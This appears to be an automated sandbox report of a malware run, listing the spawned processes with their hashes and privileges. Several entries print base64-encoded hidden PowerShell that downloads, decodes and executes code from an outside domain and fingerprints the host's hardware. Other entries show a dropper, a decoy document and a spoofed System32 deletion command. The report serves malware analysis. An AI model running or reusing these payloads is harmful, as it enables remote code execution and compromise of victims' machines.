                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:05:29:28
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3C76.tmp" "c:\Users\user\AppData\Local\Temp\t1fagedb\CSC5EF4F498469D4A7EB6829710C89A123D.TMP"
                                                                                    Imagebase:0x7ff658490000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:05:29:35
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                    Imagebase:0x7ff7a5ba0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:05:29:35
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:05:29:39
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:05:29:39
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:05:29:39
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                    Imagebase:0x7ff7a5ba0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:05:29:39
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:05:29:39
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""
                                                                                    Imagebase:0x7ff620fa0000
                                                                                    File size:1'635'104 bytes
                                                                                    MD5 hash:E7F3B8EA1B06F46176FC5C35307727D6
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:05:29:42
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\sppsvc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\sppsvc.exe
                                                                                    Imagebase:0x7ff71bf20000
                                                                                    File size:4'629'328 bytes
                                                                                    MD5 hash:30C7EF47B57367CC546173BB4BB2BB04
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:05:29:46
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff756150000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:05:30:14
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\Temp\svczHost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
                                                                                    Imagebase:0x7ff607060000
                                                                                    File size:8'351'232 bytes
                                                                                    MD5 hash:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 16%, ReversingLabs
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:05:30:14
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:05:30:14
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:21
                                                                                    Start time:05:30:15
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c sc query myRdpService
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:05:30:15
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
                                                                                    Imagebase:0x7ff7a5ba0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:05:30:15
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:24
                                                                                    Start time:05:30:15
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:05:30:15
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:sc query myRdpService
                                                                                    Imagebase:0x7ff788e30000
                                                                                    File size:72'192 bytes
                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:05:30:15
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
